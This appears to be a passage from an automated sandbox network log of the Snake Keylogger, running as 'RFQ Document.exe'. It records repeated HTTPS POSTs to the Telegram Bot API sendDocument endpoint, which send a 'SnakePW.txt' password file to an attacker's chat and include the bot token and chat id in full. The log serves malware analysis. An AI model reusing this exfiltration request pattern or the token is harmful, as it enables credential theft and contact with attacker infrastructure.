                                            Data Ascii: --------------------------8d98255d840d70dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:58 UTC198INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:58 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:58 UTC199INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12710,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808738,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            125192.168.2.449924149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:58 UTC199OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d85fd29c
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:58 UTC200OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 38 35 66 64 32 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255d85fd29cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:58 UTC200INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:58 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:58 UTC200INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12711,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808738,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            126192.168.2.449925149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:58 UTC201OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d87ed04b
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:58 UTC201OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 38 37 65 64 30 34 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255d87ed04bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:58 UTC202INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:58 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:58 UTC202INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12712,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808738,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            127192.168.2.449926149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:58 UTC203OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d896a7dc
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:58 UTC203OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 38 39 36 61 37 64 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255d896a7dcContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:58 UTC203INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:58 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:58 UTC204INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12713,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808738,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            128192.168.2.449927149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:59 UTC204OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d8b3451c
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:59 UTC204OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 38 62 33 34 35 31 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255d8b3451cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:59 UTC205INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:59 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:59 UTC205INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12714,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808739,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            129192.168.2.449928149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:59 UTC206OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d8cb1d71
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:59 UTC206OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 38 63 62 31 64 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255d8cb1d71Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:59 UTC206INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:59 GMT
                                            Content-Type: application/json
                                            Content-Length: 521
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:59 UTC207INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12716,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808739,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            13192.168.2.449787149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:23 UTC20OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c35d1eed
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:23 UTC20OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 33 35 64 31 65 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c35d1eedContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:23 UTC21INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:23 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:23 UTC21INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12592,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808703,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            130192.168.2.449929149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:59 UTC207OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d8ff9058
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:59 UTC208OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 38 66 66 39 30 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255d8ff9058Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:59 UTC208INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:59 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
